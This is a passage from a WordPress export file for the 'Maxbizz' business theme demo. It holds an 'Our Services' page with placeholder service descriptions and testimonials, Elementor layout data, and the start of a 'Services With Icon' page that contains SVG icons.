			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Explore More</a>	    
	        testimonials	        <h3>What People Say About Us</h3>	    
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>868</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"50913d0","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6431d9b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d79a54","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d6f8efd","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"403e7f7","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"53a4218","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"40e4f84","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"33cde09","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"99d507e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8bc24d4","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"beb742d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3c860b2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"44fef9d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5e5c00d","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true},{"id":"89aa30f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"d6a51ae","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"edcdae5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9ec60d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"880ea70","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"e248180","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"ec9ed31","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"6dc6dd7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7a91f5f","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5e9f9e9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a13a110","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5df37f4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1cb357c","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"da8c1a3","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":878},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e17a0cf","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"46be8a0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b31309c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"1cb8d1d","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"1ce3e2f","elType":"section","settings":{"background_background":"classic","background_color":"#FF8523","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fe015a4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"719b6b2","elType":"widget","settings":{"image_carousel":[{"_id":"e5f9d6d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"5966eb5","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"d89b073","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"6663b67","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"23bce51","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"70a824d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}}],"tshow":"6","tshow_tablet":"3","dots":"false"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:10;}}s:8:"advanced";a:1:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:5;}s:14:"section_layout";a:2:{s:6:"layout";i:4;s:3:"gap";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:8:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:8;s:4:"link";i:8;s:5:"title";i:7;s:3:"des";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:10:"radius_box";i:8;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services With Icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz/services-with-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:16:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=885</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
